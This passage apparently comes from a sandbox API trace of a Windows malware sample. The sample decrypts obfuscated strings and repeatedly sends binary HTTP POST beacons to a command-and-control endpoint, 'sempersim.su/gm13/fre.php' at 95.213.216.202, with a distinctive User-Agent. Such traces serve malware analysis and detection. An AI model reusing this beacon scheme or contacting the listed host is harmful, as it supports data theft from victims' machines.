Flags=0x0, Size=0x3e) returned 0x643368 [0200.520] GetProcessHeap () returned 0x620000 [0200.520] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1fdc) returned 0x646d70 [0200.521] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0200.521] wvsprintfA (in: param_1=0x646d70, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 6585B194\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0200.521] GetProcessHeap () returned 0x620000 [0200.522] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xef) returned 0x63a880 [0200.522] GetProcessHeap () returned 0x620000 [0200.522] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0200.522] send (s=0x364, buf=0x63a880*, len=237, flags=0) returned 237 [0200.523] send (s=0x364, buf=0x6421e0*, len=159, flags=0) returned 159 [0200.523] GetProcessHeap () returned 0x620000 [0200.523] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfd0) returned 0x646d70 [0200.524] recv (in: s=0x364, buf=0x646d70, len=4048, flags=0 | out: buf=0x646d70*) returned 237 [0201.656] GetProcessHeap () returned 0x620000 [0201.656] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a880 | out: hHeap=0x620000) returned 1 [0201.657] GetProcessHeap () returned 0x620000 [0201.657] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643368 | out: hHeap=0x620000) returned 1 [0201.657] GetProcessHeap () returned 0x620000 [0201.658] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63d6b8 | out: hHeap=0x620000) returned 1 [0201.658] GetProcessHeap () returned 0x620000 [0201.658] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63ba08 | out: hHeap=0x620000) returned 1 [0201.658] closesocket (s=0x364) returned 0 [0201.658] GetProcessHeap () returned 0x620000 [0201.658] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b5d0 | out: hHeap=0x620000) returned 1 [0201.658] GetProcessHeap () returned 0x620000 [0201.659] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x645a80 | out: hHeap=0x620000) returned 1 [0201.659] GetProcessHeap () returned 0x620000 [0201.659] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643200 | out: hHeap=0x620000) returned 1 [0201.659] GetProcessHeap () returned 0x620000 [0201.659] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0201.668] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x646d70, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x2d0) returned 0x364 [0201.672] Sleep (dwMilliseconds=0xea60) [0201.684] GetProcessHeap () returned 0x620000 [0201.684] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643488 [0201.685] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0201.685] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0201.690] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0201.690] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63ba08) returned 1 [0201.699] GetProcessHeap () returned 0x620000 [0201.699] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x639068 [0201.700] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0201.701] CryptImportKey (in: hProv=0x63ba08, pbData=0x639068*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0201.701] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0201.702] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0201.702] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0201.703] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0201.703] GetProcessHeap () returned 0x620000 [0201.703] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x639068 | out: hHeap=0x620000) returned 1 [0201.704] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0201.704] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643488, pdwDataLen=0x19fcfc | out: pbData=0x643488, pdwDataLen=0x19fcfc) returned 1 [0201.705] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0201.705] CryptDestroyKey (hKey=0x62d710) returned 1 [0201.706] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0201.706] CryptReleaseContext (hProv=0x63ba08, dwFlags=0x0) returned 1 [0201.706] GetProcessHeap () returned 0x620000 [0201.706] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x646770 [0201.707] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0201.707] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0201.708] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0201.786] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0201.787] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0201.787] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0201.788] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0201.788] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0201.788] GetProcessHeap () returned 0x620000 [0201.788] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0201.788] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0201.789] GetProcessHeap () returned 0x620000 [0201.789] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0201.789] GetProcessHeap () returned 0x620000 [0201.790] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646770 | out: hHeap=0x620000) returned 1 [0201.790] GetProcessHeap () returned 0x620000 [0201.790] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643488 | out: hHeap=0x620000) returned 1 [0201.790] GetProcessHeap () returned 0x620000 [0201.790] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643170 [0201.791] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0201.792] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0201.797] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0201.798] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63ba08) returned 1 [0201.804] GetProcessHeap () returned 0x620000 [0201.804] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x638f78 [0201.805] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0201.805] CryptImportKey (in: hProv=0x63ba08, pbData=0x638f78*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d7d0) returned 1 [0201.806] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0201.806] CryptSetKeyParam (hKey=0x62d7d0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0201.807] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0201.807] CryptSetKeyParam (hKey=0x62d7d0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0201.807] GetProcessHeap () returned 0x620000 [0201.808] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638f78 | out: hHeap=0x620000) returned 1 [0201.808] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0201.809] CryptDecrypt (in: hKey=0x62d7d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643170, pdwDataLen=0x19fcfc | out: pbData=0x643170, pdwDataLen=0x19fcfc) returned 1 [0201.809] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0201.810] CryptDestroyKey (hKey=0x62d7d0) returned 1 [0201.810] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0201.811] CryptReleaseContext (hProv=0x63ba08, dwFlags=0x0) returned 1 [0201.811] GetProcessHeap () returned 0x620000 [0201.811] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x645a80 [0201.811] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0201.812] StrStrA (lpFirst="http://sempersim.su/gm13/fre.php", lpSrch="http://") returned="http://sempersim.su/gm13/fre.php" [0201.812] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0201.813] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch="/") returned="/gm13/fre.php" [0201.813] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0201.814] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch=":") returned 0x0 [0201.814] GetProcessHeap () returned 0x620000 [0201.814] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0201.814] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x63c438*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ea60*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) returned 0 [0201.817] GetProcessHeap () returned 0x620000 [0201.817] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b650 [0201.817] socket (af=2, type=1, protocol=6) returned 0x368 [0201.817] connect (s=0x368, name=0x63ea60*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), namelen=16) returned 0 [0201.868] FreeAddrInfoW (pAddrInfo=0x63c438*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ea60*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) [0201.868] GetProcessHeap () returned 0x620000 [0201.868] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d) returned 0x63bcb0 [0201.868] GetProcessHeap () returned 0x620000 [0201.868] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x201b) returned 0x646d70 [0201.868] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0201.869] wvsprintfA (in: param_1=0x646d70, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0201.869] GetProcessHeap () returned 0x620000 [0201.869] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xae) returned 0x63d6b8 [0201.869] GetProcessHeap () returned 0x620000 [0201.870] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0201.870] GetProcessHeap () returned 0x620000 [0201.870] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e) returned 0x643638 [0201.870] GetProcessHeap () returned 0x620000 [0201.870] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1fdc) returned 0x646d70 [0201.871] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0201.872] wvsprintfA (in: param_1=0x646d70, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 6585B194\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0201.872] GetProcessHeap () returned 0x620000 [0201.872] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xef) returned 0x63a880 [0201.872] GetProcessHeap () returned 0x620000 [0201.872] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0201.872] send (s=0x368, buf=0x63a880*, len=237, flags=0) returned 237 [0201.873] send (s=0x368, buf=0x6421e0*, len=159, flags=0) returned 159 [0201.873] GetProcessHeap () returned 0x620000 [0201.873] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfd0) returned 0x646d70 [0201.873] recv (in: s=0x368, buf=0x646d70, len=4048, flags=0 | out: buf=0x646d70*) returned 237 [0203.400] GetProcessHeap () returned 0x620000 [0203.400] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a880 | out: hHeap=0x620000) returned 1 [0203.401] GetProcessHeap () returned 0x620000 [0203.401] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643638 | out: hHeap=0x620000) returned 1 [0203.412] GetProcessHeap () returned 0x620000 [0203.413] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63d6b8 | out: hHeap=0x620000) returned 1 [0203.413] GetProcessHeap () returned 0x620000 [0203.413] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63bcb0 | out: hHeap=0x620000) returned 1 [0203.413] closesocket (s=0x368) returned 0 [0203.414] GetProcessHeap () returned 0x620000 [0203.414] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b650 | out: hHeap=0x620000) returned 1 [0203.414] GetProcessHeap () returned 0x620000 [0203.414] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x645a80 | out: hHeap=0x620000) returned 1 [0203.415] GetProcessHeap () returned 0x620000 [0203.415] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643170 | out: hHeap=0x620000) returned 1 [0203.415] GetProcessHeap () returned 0x620000 [0203.415] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0203.415] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x646d70, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x628) returned 0x368 [0203.417] Sleep (dwMilliseconds=0xea60) [0203.435] GetProcessHeap () returned 0x620000 [0203.435] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x642e58 [0203.436] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0203.436] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0203.443] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0203.443] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63bcb0) returned 1 [0203.451] GetProcessHeap () returned 0x620000 [0203.451] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x639308 [0203.452] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0203.452] CryptImportKey (in: hProv=0x63bcb0, pbData=0x639308*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0203.453] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0203.453] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0203.454] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0203.454] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0203.454] GetProcessHeap () returned 0x620000 [0203.454] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x639308 | out: hHeap=0x620000) returned 1 [0203.455] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0203.455] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x642e58, pdwDataLen=0x19fcfc | out: pbData=0x642e58, pdwDataLen=0x19fcfc) returned 1 [0203.456] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0203.456] CryptDestroyKey (hKey=0x62d710) returned 1 [0203.457] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0203.457] CryptReleaseContext (hProv=0x63bcb0, dwFlags=0x0) returned 1 [0203.457] GetProcessHeap () returned 0x620000 [0203.457] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x645a80 [0203.458] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0203.458] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0203.458] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0203.459] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0203.459] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0203.459] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0203.460] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0203.460] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0203.460] GetProcessHeap () returned 0x620000 [0203.460] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0203.460] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0203.461] GetProcessHeap () returned 0x620000 [0203.461] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0203.461] GetProcessHeap () returned 0x620000 [0203.461] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x645a80 | out: hHeap=0x620000) returned 1 [0203.461] GetProcessHeap () returned 0x620000 [0203.462] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x642e58 | out: hHeap=0x620000) returned 1 [0203.462] GetProcessHeap () returned 0x620000 [0203.462] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x642fc0 [0203.465] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0203.465] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0203.470] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0203.470] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63b7e8) returned 1 [0203.477] GetProcessHeap () returned 0x620000 [0203.478] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x6390f8 [0203.478] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0203.478] CryptImportKey (in: hProv=0x63b7e8, pbData=0x6390f8*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d7d0) returned 1 [0203.479] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0203.479] CryptSetKeyParam (hKey=0x62d7d0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0203.482] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0203.482] CryptSetKeyParam (hKey=0x62d7d0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0203.482] GetProcessHeap () returned 0x620000 [0203.482] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6390f8 | out: hHeap=0x620000) returned 1 [0203.483] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0203.483] CryptDecrypt (in: hKey=0x62d7d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x642fc0, pdwDataLen=0x19fcfc | out: pbData=0x642fc0, pdwDataLen=0x19fcfc) returned 1 [0203.484] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0203.485] CryptDestroyKey (hKey=0x62d7d0) returned 1 [0203.485] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0203.486] CryptReleaseContext (hProv=0x63b7e8, dwFlags=0x0) returned 1 [0203.486] GetProcessHeap () returned 0x620000 [0203.486] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x644fb8 [0203.486] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0203.487] StrStrA (lpFirst="http://sempersim.su/gm13/fre.php", lpSrch="http://") returned="http://sempersim.su/gm13/fre.php" [0203.487] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0203.488] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch="/") returned="/gm13/fre.php" [0203.488] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0203.489] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch=":") returned 0x0 [0203.489] GetProcessHeap () returned 0x620000 [0203.489] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0203.489] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x63c3e8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ecb8*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) returned 0 [0203.491] GetProcessHeap () returned 0x620000 [0203.491] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b520 [0203.491] socket (af=2, type=1, protocol=6) returned 0x36c [0203.492] connect (s=0x36c, name=0x63ecb8*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), namelen=16) returned 0 [0203.542] FreeAddrInfoW (pAddrInfo=0x63c3e8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ecb8*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) [0203.543] GetProcessHeap () returned 0x620000 [0203.543] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d) returned 0x63ba08 [0203.543] GetProcessHeap () returned 0x620000 [0203.543] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x201b) returned 0x646d70 [0203.544] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0203.545] wvsprintfA (in: param_1=0x646d70, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0203.545] GetProcessHeap () returned 0x620000 [0203.545] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xae) returned 0x63d6b8 [0203.545] GetProcessHeap () returned 0x620000 [0203.546] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0203.546] GetProcessHeap () returned 0x620000 [0203.546] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e) returned 0x643128 [0203.546] GetProcessHeap () returned 0x620000 [0203.546] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1fdc) returned 0x646d70 [0203.547] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0203.547] wvsprintfA (in: param_1=0x646d70, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 6585B194\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0203.547] GetProcessHeap () returned 0x620000 [0203.547] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xef) returned 0x63a880 [0203.548] GetProcessHeap () returned 0x620000 [0203.548] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0203.548] send (s=0x36c, buf=0x63a880*, len=237, flags=0) returned 237 [0203.549] send (s=0x36c, buf=0x6421e0*, len=159, flags=0) returned 159 [0203.549] GetProcessHeap () returned 0x620000 [0203.549] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfd0) returned 0x646d70 [0203.549] recv (in: s=0x36c, buf=0x646d70, len=4048, flags=0 | out: buf=0x646d70*) returned 237 [0205.178] GetProcessHeap () returned 0x620000 [0205.178] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a880 | out: hHeap=0x620000) returned 1 [0205.178] GetProcessHeap () returned 0x620000 [0205.178] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643128 | out: hHeap=0x620000) returned 1 [0205.178] GetProcessHeap () 